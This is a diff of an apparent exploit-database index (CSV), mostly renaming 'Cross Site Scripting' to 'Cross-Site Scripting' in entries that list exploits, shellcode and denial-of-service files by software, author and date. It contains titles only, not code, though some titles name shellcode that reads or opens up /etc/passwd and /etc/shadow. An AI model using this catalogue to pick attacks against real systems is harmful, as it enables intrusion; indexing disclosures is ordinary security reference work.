Gold 2.1 - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37205,platforms/php/webapps/37205.txt,"LongTail JW Player 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 37206,platforms/php/webapps/37206.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 37207,platforms/php/webapps/37207.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.random.php dir Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 -37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a 'onlyDB' Parameter Cross Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 +37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a 'onlyDB' Parameter Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post 1.0.6 - File Include",2015-06-05,Kuroi'SH,php,webapps,0 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal and Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0 37252,platforms/php/webapps/37252.txt,"WordPress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 -37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross Site Scripting",2012-05-16,"Daniel Godoy",php,webapps,0 -37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo - 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 +37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",php,webapps,0 +37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 -37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 +37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 and Crucible 2.5.7 Plugins XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 -37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting",2012-05-21,MustLive,php,webapps,0 +37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 @@ -33634,8 +33634,8 @@ id,file,description,date,author,platform,type,port 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0 37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0 -37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 -37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 +37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 +37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 @@ -33666,7 +33666,7 @@ id,file,description,date,author,platform,type,port 37280,platforms/php/webapps/37280.txt,"concrete5 index.php/tools/required/sitemap_search_selector Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 -37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0 +37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0 37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service",2015-06-15,3unnym00n,windows,dos,0 @@ -33677,12 +33677,12 @@ id,file,description,date,author,platform,type,port 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 -37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0 +37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injection and Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 37331,platforms/php/webapps/37331.py,"WHMCS 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF",2015-06-16,"Jerold Hoong",php,webapps,0 37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 -37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0 +37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0 37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 @@ -33699,15 +33699,15 @@ id,file,description,date,author,platform,type,port 37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 -37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0 +37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0 -37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross Site Scripting",2012-06-01,Aboud-el,php,webapps,0 +37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 -39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 +39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 @@ -33742,22 +33742,22 @@ id,file,description,date,author,platform,type,port 37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof Of Concept",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 -37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple XSS and XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 +37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple XSS / XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Stored XSS",2015-06-26,"Marco Delai",multiple,webapps,0 37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0 -37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0 -37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0 +37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0 +37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross-Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0 37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload",2012-06-13,KedAns-Dz,php,webapps,0 37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - Encoded execve shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 -37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 +37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 -37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross Site Scripting",2012-06-17,anonymous,php,webapps,0 +37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting",2012-06-17,anonymous,php,webapps,0 37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37407,platforms/php/webapps/37407.txt,"ADICO 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 @@ -33767,38 +33767,38 @@ id,file,description,date,author,platform,type,port 37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 -37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection",2012-06-16,JosS,php,webapps,0 -37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Inclusion",2012-06-16,snup,php,webapps,0 -37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 +37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injection",2012-06-16,JosS,php,webapps,0 +37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0 +37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 -37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 +37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 37566,platforms/php/dos/37566.php,"PHP 5.4.3 PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 -37497,platforms/php/webapps/37497.txt,"Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 +37497,platforms/php/webapps/37497.txt,"Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - encoded execve shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0 -37430,platforms/php/webapps/37430.txt,"CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 +37430,platforms/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 -37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross Site Scripting",2012-06-19,indoushka,php,webapps,0 +37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting",2012-06-19,indoushka,php,webapps,0 37434,platforms/php/webapps/37434.txt,"e107 FileDownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 -37435,platforms/php/webapps/37435.txt,"web@all Cross Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0 -37436,platforms/php/webapps/37436.txt,"Commentics 'index.php' Cross Site Scripting",2012-06-20,"Jean Pascal Pereira",php,webapps,0 +37435,platforms/php/webapps/37435.txt,"web@all Cross-Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0 +37436,platforms/php/webapps/37436.txt,"Commentics 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",php,webapps,0 37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0 37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",php,webapps,0 -37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting",2012-06-21,"Sooraj K.S",php,webapps,0 +37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross-Site Scripting",2012-06-21,"Sooraj K.S",php,webapps,0 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80 37441,platforms/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434 37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0 37444,platforms/php/webapps/37444.txt,"Cotonti 'admin.php' SQL Injection",2012-06-22,AkaStep,php,webapps,0 -37445,platforms/php/webapps/37445.txt,"CMS Lokomedia Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0 +37445,platforms/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0 37446,platforms/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80 37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF",2015-06-30,"Wissam Bashour",asp,webapps,0 37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,Metasploit,multiple,remote,0 @@ -33808,9 +33808,9 @@ id,file,description,date,author,platform,type,port 37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 -37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 +37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0 -37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor 'spellchecker.php') Cross Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 +37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor 'spellchecker.php') Cross-Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 37459,platforms/php/webapps/37459.txt,"Umapresence - Local File Inclusion / Arbitrary File Deletion",2012-06-25,"Sammy FORGIT",php,webapps,0 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS - HTML Injection",2012-06-27,the_cyber_nuxbie,php,webapps,0 @@ -33819,29 +33819,29 @@ id,file,description,date,author,platform,type,port 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer '.avi' File Divide-By-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 37466,platforms/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion 'upload.php' Arbitrary File Upload",2012-06-28,"Sammy FORGIT",php,webapps,0 -37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 Multiple Cross Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0 +37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0 37468,platforms/php/webapps/37468.php,"JAKCMS PRO 2.2.6 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",php,webapps,0 37469,platforms/php/webapps/37469.txt,"LIOOSYS CMS - SQL Injection / Information Disclosure",2012-06-29,MustLive,php,webapps,0 -37470,platforms/multiple/webapps/37470.txt,"SWFUpload 'movieName' Parameter Cross Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 +37470,platforms/multiple/webapps/37470.txt,"SWFUpload 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0 37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0 -37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0 +37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 37498,platforms/php/webapps/37498.txt,"Kajona 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 -37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 +37476,platforms/php/webapps/37476.txt,"php MBB Cross-Site Scripting and SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0 37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP 'admin.php' Multiple SQL Injection",2012-07-04,snup,php,webapps,0 37480,platforms/windows/dos/37480.pl,"Solar FTP Server Denial of Service",2012-07-05,coolkaveh,windows,dos,0 -37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin 'msg' Parameter Cross Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin 'key' Parameter Cross Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 +37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 